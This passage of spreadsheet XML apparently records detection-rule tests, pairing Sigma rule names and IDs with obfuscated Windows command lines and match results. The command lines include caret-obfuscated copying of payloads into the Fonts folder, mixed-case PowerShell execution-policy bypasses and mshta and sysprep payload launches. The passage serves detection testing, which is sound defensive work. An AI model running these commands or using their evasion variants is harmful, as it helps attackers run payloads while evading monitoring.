      <c r="J1641" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1641" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1642" ht="15.75" customHeight="1" s="42">
      <c r="A1642" s="43" t="n"/>
      <c r="B1642" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1642" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1642" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1642" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1642" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1642" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1642" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1643" ht="15.75" customHeight="1" s="42">
      <c r="A1643" s="43" t="n"/>
      <c r="B1643" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1643" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1643" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1643" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1643" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1643" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1643" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1644" ht="15.75" customHeight="1" s="42">
      <c r="A1644" s="43" t="n"/>
      <c r="B1644" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1644" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1644" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1644" s="44" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.vbs C:\Windows\System32\..\Fonts\</t>
        </is>
      </c>
      <c r="F1644" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1644" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1644" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1644" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1644" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1645" ht="15.75" customHeight="1" s="42">
      <c r="A1645" s="43" t="n"/>
      <c r="B1645" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1645" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1645" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1645" s="44" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.exe %SystemRoot%\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F1645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1645" s="43" t="n"/>
      <c r="J1645" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1645" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1646" ht="15.75" customHeight="1" s="42">
      <c r="A1646" s="43" t="n"/>
      <c r="B1646" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C1646" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D1646" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E1646" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F1646" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1646" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1646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646" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1646" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1647" ht="15.75" customHeight="1" s="42">
      <c r="A1647" s="43" t="n"/>
      <c r="B1647" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C1647" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D1647" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E1647" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcUTiONPOliCY Bypass -fIle C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F1647" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1647" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1647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647" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1647" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1648" ht="15.75" customHeight="1" s="42">
      <c r="A1648" s="43" t="n"/>
      <c r="B1648" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C1648" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D1648" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E1648" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -execUTIoNpOLicY Bypass -FILE C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F1648" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1648" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1648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648" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1648" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1649" ht="15.75" customHeight="1" s="42">
      <c r="A1649" s="43" t="n"/>
      <c r="B1649" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C1649" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D1649" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E1649" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -File C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F1649" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1649" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1649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649" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1649" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1650" ht="15.75" customHeight="1" s="42">
      <c r="A1650" s="43" t="n"/>
      <c r="B1650" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C1650" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D1650" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E1650" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -f C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F1650" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1650" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1650" s="44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650" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1650" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1651" ht="15.75" customHeight="1" s="42">
      <c r="A1651" s="43" t="n"/>
      <c r="B1651" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_env_folder</t>
        </is>
      </c>
      <c r="C1651" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder</t>
        </is>
      </c>
      <c r="D1651" s="44" t="inlineStr">
        <is>
          <t>1228c958-e64e-4e71-92ad-7d429f4138ba</t>
        </is>
      </c>
      <c r="E1651" s="44" t="inlineStr">
        <is>
          <t>mshta.exe C:/Users/Public/payload.hta</t>
        </is>
      </c>
      <c r="F1651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1651" s="44" t="n"/>
      <c r="J1651" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1651" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1652" ht="15.75" customHeight="1" s="42">
      <c r="A1652" s="43" t="n"/>
      <c r="B1652" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1652" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1652" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1652" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "cd C:\Windows\Temp &amp;&amp; powershell.exe -ExecutionPolicy Bypass -File .\script.ps1"</t>
        </is>
      </c>
      <c r="F1652" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1652" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1652" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J1652" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1652" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1653" ht="15.75" customHeight="1" s="42">
      <c r="A1653" s="43" t="n"/>
      <c r="B1653" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1653" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1653" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1653" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "cd C:\Windows\Temp &amp;&amp; powershell.exe -ExecutionPolicy Bypass -File .\script.ps1"</t>
        </is>
      </c>
      <c r="F1653" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1653" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1653" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J1653" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1653" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1654" ht="15.75" customHeight="1" s="42">
      <c r="A1654" s="43" t="n"/>
      <c r="B1654" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1654" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1654" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1654" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F1654" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1654" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1654" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1654" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1654" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1655" ht="15.75" customHeight="1" s="42">
      <c r="A1655" s="43" t="n"/>
      <c r="B1655" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1655" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1655" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1655" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FiLe C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F1655" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1655" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1655" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1655" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1655" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1656" ht="15.75" customHeight="1" s="42">
      <c r="A1656" s="43" t="n"/>
      <c r="B1656" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1656" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1656" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1656" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExECUTIOnPoliCY Bypass -FIle C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F1656" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1656" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1656" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1656" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1656" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1657" ht="15.75" customHeight="1" s="42">
      <c r="A1657" s="43" t="n"/>
      <c r="B1657" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1657" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1657" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1657" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTIONpOliCY Bypass -fILe C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F1657" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1657" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1657" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1657" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1657" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1658" ht="15.75" customHeight="1" s="42">
      <c r="A1658" s="43" t="n"/>
      <c r="B1658" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1658" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1658" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1658" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exEcutiOnPOlIcy Bypass -FiLe C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F1658" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1658" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1658" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1658" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1658" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1659" ht="15.75" customHeight="1" s="42">
      <c r="A1659" s="43" t="n"/>
      <c r="B1659" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1659" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1659" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1659" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\script.ps1 -Comment " &gt; "</t>
        </is>
      </c>
      <c r="F1659" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1659" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1659" s="4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659" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1659" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1660" ht="15.75" customHeight="1" s="42">
      <c r="A1660" s="43" t="n"/>
      <c r="B1660" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1660" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1660" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1660" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExECUTIoNPolicY Bypass -FILe C:\Windows\Temp\script.ps1 -coMMeNt " &gt; "</t>
        </is>
      </c>
      <c r="F1660" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1660" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1660" s="4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660" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1660" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1661" ht="15.75" customHeight="1" s="42">
      <c r="A1661" s="43" t="n"/>
      <c r="B1661" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1661" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1661" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1661" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -File C:\Windows\Temp\script.ps1 /"Comment" " &gt; "</t>
        </is>
      </c>
      <c r="F1661" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1661" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1661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661" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1661" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1662" ht="15.75" customHeight="1" s="42">
      <c r="A1662" s="43" t="n"/>
      <c r="B1662" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1662" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1662" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1662" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExEcUtIONPOliCy Bypass -file C:\Windows\Temp\script.ps1 -"Comment" " &gt; "</t>
        </is>
      </c>
      <c r="F1662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1662" s="4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662" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1662" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1663" ht="15.75" customHeight="1" s="42">
      <c r="A1663" s="43" t="n"/>
      <c r="B1663" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C1663" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D1663" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E1663" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTIoNPoLIcY Bypass -FILE C:\Windows\Temp\script.ps1 -comMEnT " &gt; "</t>
        </is>
      </c>
      <c r="F1663" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1663" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1663" s="4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663" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1663" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1664" ht="15.75" customHeight="1" s="42">
      <c r="A1664" s="43" t="n"/>
      <c r="B1664" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysprep_appdata</t>
        </is>
      </c>
      <c r="C1664" s="44" t="inlineStr">
        <is>
          <t>Sysprep on AppData Folder</t>
        </is>
      </c>
      <c r="D1664" s="44" t="inlineStr">
        <is>
          <t>d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e</t>
        </is>
      </c>
      <c r="E1664" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "cd C:\Users\Default\AppData\Local\Temp &amp;&amp; C:\Windows\System32\sysprep\sysprep.exe /unattend:payload.xml"</t>
        </is>
      </c>
      <c r="F1664" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1664" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1664" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1664" s="43" t="n"/>
      <c r="J1664" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1664" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1665" ht="15.75" customHeight="1" s="42">
      <c r="A1665" s="43" t="n"/>
      <c r="B1665" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysprep_appdata</t>
        </is>
      </c>
      <c r="C1665" s="44" t="inlineStr">
        <is>
          <t>Sysprep on AppData Folder</t>
        </is>
      </c>
      <c r="D1665" s="44" t="inlineStr">
        <is>
          <t>d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e</t>
        </is>
      </c>
      <c r="E1665" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "cd C:\Users\Default\AppData\Local\Temp &amp;&amp; C:\Windows\System32\sysprep\sysprep.exe /unattend:payload.xml"</t>
        </is>
      </c>
      <c r="F1665" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1665" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1665" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1665" s="43" t="n"/>
      <c r="J1665" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1665" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1666" ht="15.75" customHeight="1" s="42">
      <c r="A1666" s="43" t="n"/>
      <c r="B1666" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1666" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1666" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1666" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" -n CustomRepo -a https://example.com</t>
        </is>
      </c>
      <c r="F1666" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1666" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1666" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1666" s="44" t="n"/>
      <c r="J1666" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1666" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1667" ht="15.75" customHeight="1" s="42">
      <c r="A1667" s="43" t="n"/>
      <c r="B1667" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1667" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1667" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1667" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo --accept-source-arms https://example.com</t>
        </is>
      </c>
      <c r="F1667" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1667" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1667" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1667" s="44" t="n"/>
      <c r="J1667" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1667" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1668" ht="15.75" customHeight="1" s="42">
      <c r="A1668" s="43" t="n"/>
      <c r="B1668" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1668" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1668" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1668" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" --no-deps CustomRepo -a https://example.com</t>
        </is>
      </c>
      <c r="F1668" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1668" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1668" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1668" s="44" t="n"/>
      <c r="J1668" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1668" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1669" ht="15.75" customHeight="1" s="42">
      <c r="A1669" s="43" t="n"/>
      <c r="B1669" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1669" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1669" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
